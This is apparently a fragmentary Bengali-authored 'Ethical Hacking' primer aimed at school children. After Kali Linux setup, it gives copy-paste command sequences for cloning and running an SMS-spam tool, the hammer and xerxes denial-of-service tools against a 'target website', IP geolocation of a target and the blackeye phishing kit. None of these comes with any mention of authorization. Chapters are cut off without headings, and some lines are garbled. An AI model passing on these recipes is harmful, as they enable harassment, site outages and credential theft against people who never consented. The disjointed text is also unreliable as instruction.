Professional Documents
Culture Documents
ISBN Interior
ISBN Interior
ISBN Interior
Ethical Hacking
Part- 1
ZED Prokashoni
Ethical Hacking Part-1
Md. Abu Zakaria
Copyright: Author
1st publication: July 2021
Publisher:
Z Publishing,
Phone: 017560096
Facebook.com/ZEDProkashoni
Printing:
Tasin Computers
Kaliganj, Nageshwari, Kurigram
Ethical Hacking
Part- 1
ZED Prokashoni
Ethical Hacking Part-1
Dedicated to
My Father & Mother
Ethical Hacking Part-1
Index
Introduction
About the author
Author”s introduction
Chapter zero: Before the start
Chapter One: Kali Linux Installation
Chapter Two: Basic Uses of Linux
Chapter Three: E-mail B0mbing
Chapter Four: E-mail Sp00fing
Chapter Five: SMS B0mbing
Chapter Six: An0nymous SMS
Chapter Seven: Information Gathering
Chapter Eight: D0S-DD0S Attack
Chapter nine: Locati0n tracking
Chapter Ten: Wi-Fi Network Jamming
Chapter Eleven: MAC Changing
Chapter Twelve: Phi*shing
Ethical Hacking Part-1
Introduction
Computers were born to compute or calculate. But on the computer people listen to
music, watch movies, write letters, use Facebook, surf the internet, even steal but people
don't think about the security of their cyber life! But the joy of knowing about cyber
security is not in anything else, all you need to know to know about ink Linux (Operating
System) and use it.
Cyber security and ethical hacking are taught in universities or large educational
institutions, but not many people know that even school-college children can easily
acquire knowledge about it. I have been thinking for a long time, writing a book like
this for school children; But I could not get up in time.
Now I sat down to write for a while. Hopefully, by reading this book, you will get basic
and advanced ideas about cyber security and ethical hacking and you can learn a lot
from the internet on your own. I will try my best to explain everything to you part by
part in simple, straightforward and fluent language.
If you have any comments about the book, please let us know at:
E-mail: zedthedanger@yandex.com
Facebook: www.facebook.com/ZEDProkashoni
Twitter: www.twitter.com/ZEDProkashoni
Ethical Hacking Part-1
About Author
Md. Abu Zakaria was born on August 20, 2002 in Kurigram. The village home is in Vita
village of West Fandi in Kaliganj union of Nageshwari upazila of Kurigram district. His
father Md. Abdul Aziz is a farmer and his mother Jahanara Begum is a housewife. He
now lives in the Tejgaon area of Dhaka. He is the author of several popular
technology books in Bengali.
He studied at Pushkarini Par Primary School, Kaliganj Huzur Ali High School, Dhaka
Polytechnic Institute. In 2013, he passed GPA-5 in the final examination of primary
education and passed the fifth class.
He was admitted to Kaliganj Huzur Ali High School in 2014. He passed the Junior
School Certificate examination from that school in 2016 and the Secondary School
Certificate examination in 2019 with GPA-5. Then in the same year he was admitted in
Ethical Hacking Part-1
the Department of Computer Science and Engineering of the best diploma engineering
institute of the country "Dhaka Polytechnic Institute". He is still studying there.
Facebook: www.facebook.com/ABUJAKARIA316
Instagram: www.instagram.com/abujakariacse
Author’s Introduction
I have met many children who mix with different places and environments and they
often ask me which book to read or where to learn about cyber security! The book is
written for them. However, I have seen many people who do not feel comfortable
reading English books, so many fall behind and do not get a chance to overcome that
weakness. I am sure that if they had started with a Bengali book, they could have
learned better.
The book is useful for those who are learning about cyber security for the first time in
their lives. Students in class nine or above should not have any problem reading the
book. The book only gives you a brief overview on ethical hacking and cyber security.
This is not really a book on hacking learning, but an emphasis on the basics of ethical
hacking and cyber security, so as to build a solid foundation for becoming a good quality
ethical hacker or cyber security specialist.
The computer is actually a calculating device, isn't it? Although we watch videos, listen
to music, play games and do other things with it. In fact in the end the computer
understands nothing but its commands. Hacking is mainly done with a programming
language. But we will not learn programming language in this book. We will learn how
to hack without programming, that is, with prepared programming. For this we need to
install Kali Linux (operating system) on our PC and learn how to use commands. Next
we will learn how to install Kali Linux.
The most important thing to learn hacking is attention, time and practice. Without them
you can never learn hacking. Because hacking is not a small thing, you swallow it like
water. To learn hacking, you need a fresh mind, to practice for a long time without
following a single rate. Only then can you become a good and skilled Ethical Hacker /
Cyber Security Specialist.
If after reading the above you think it is not possible by me then you still omit. Because
hacking is not possible if you do anything else. Because you don't have the patience,
confidence and courage. So get rid of the hacking thinking and try to learn something
else and develop skills in that regard. And the one who thinks you can, then start the
next chapter, how?
Ethical Hacking Part-1
We will now install Kali Live Persistence on our PCs so that we do not have to worry
about getting back to Windows PCs. This will require a pen drive. Note that if you are
above 16 GB, it will be convenient for you.
Now open the downloaded Rufus software. Then plug your pen drive into the PC. You
can see the name of your pen drive in the Device option above. Now right click on
Select in Boot Selection and hold the ink file in the folder where you were
downloading. Then go to Persistence Partition Size and do your partition. I mean, if
you have a 16 GB pen drive, make it 6 GB, and if you have 32 GB, make it 16 GB.
When you have finished booting, restart the PC and press the boot menu. Then make
a boot selection. Then you will see some options in front of you. From there, type Kali
USB Persistance and press Enter.
After a while your PC will turn on and Kali will ask for Linux password. Enter kali in
the password box. That means Username & Password will be kali.
Ethical Hacking Part-1
The icon marked with a red arrow on the screen is Application Manager, and the icon
marked with a yellow arrow is Terminal.
In this book we use Terminal the most. The terminal looks exactly like the command
prompt on a Windows PC. Here you just have to work with commands.
And we will use all the files or software used in the terminal from GitHub. GitHub is
the only free platform where you can save and use your code or program at any time.
And the icons marked by the green arrow are the partition manager of your hard
drive.
This is how you can become a pro level ethical hacker if you try it yourself and learn
something from Google and YouTube.
Ethical Hacking Part-1
Method 3: -
https://github.com/coderwarzone/sms-spam.git - taken from GitHub
ls
cd sms-spam
ls
chmod + x kurulum.sh
ls
./kurulum.sh
Ethical Hacking Part-1
Another way is to go to the browser and search for softclever free sms sender then go
to their website and create an account and send sms. However, in Softclever apps and
Paba Play Store.
-----------------------------------------------------------------------------------------------------------
Ethical Hacking Part-1
And if you want to find out the information with the username, then open the
terminal and give the command
cd sherlock
ls
nano <username.txt>
You can visit the Whois.com site to find out more about something.
Ethical Hacking Part-1
Method 1: -
git clone https://github.com/cyweb/hammer.git
ls
cd hammer
python hammer.py
python hammer.py -s www.targetwebsite.com
Method 2: -
git clone https://github.com/XCHADXFAQ77X/XERXES.git
cd xerxes
ls
gcc xerxes.c -o xerxes
./xerxes tergetwebsite.com 80
Method 3: -
https://github.com/XCHADXFAQ77X/XERXES.git
cd desktop
ls
cd xerxes
gcc xerxes.c -o xerxes
./xerxes <targetwebsite.com> 80
Ethical Hacking Part-1
Method 2: -
Open the terminal and enter the following commands
git clone https://github.com/maldevel/IPGeoLocation.git
ls
cd IPGeoLocation
pip install -r requirements.txt
python ipgeolocation.py
python ipgeolocation.py -m (for my ip check)
python ipgeolocation.py -t www.targetsite.com
Here I have asked you to select the option with numbering. I hope you understand
and from now on I will be able to do software based network jamming.
Ethical Hacking Part-1
Method 2: -
git clone https://github.com/An0nUD4Y/blackeye.git
cd blackeye
bash blackeye.sh
Method 3: -
git clone
https://github.com/8L4NK/blackeye.git/https://github.com/thelinuxchoice/blackeye
cd blackeye
bash blackeye.sh